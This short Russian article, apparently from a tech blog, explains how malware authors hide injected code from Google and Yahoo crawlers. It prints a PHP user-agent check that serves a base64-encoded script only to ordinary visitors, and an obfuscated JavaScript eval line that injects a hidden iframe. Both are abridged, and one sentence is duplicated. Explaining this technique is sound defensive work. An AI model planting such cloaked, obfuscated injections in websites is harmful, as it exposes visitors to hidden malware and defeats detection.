Google довольно хорошо определяет вредоносный код на HTML-страницах, после чего уличённый сайт попадает в «чёрный список» и понижается в результатах поиска. Хуже того, о заражении мгновенно становится известно владельцу сайта, который получает фидбек от пользователей, пришедших с поисковика. Всё это очень плохо для бизнеса вирусописателей. Вот почему они придумали новый трюк: начали добавлять в страницу закодированный код вроде такого:
То есть malware проверяет, если на сайт зашёл поисковый бот Google или Yahoo, то в этом случае вредоносный код не появляется на странице. Для остальных посетителей выводится скрипт.
if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
{
return base64_decode("PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+");
}
else
{
return "";
}То есть malware проверяет, если на сайт зашёл поисковый бот Google или Yahoo, то в этом случае вредоносный код не появляется на странице. Для остальных посетителей выводится скрипт.
var bpxDsSbm8='d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@ *%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r;eval(bpxDsSbm8.split('*%@').join(""));
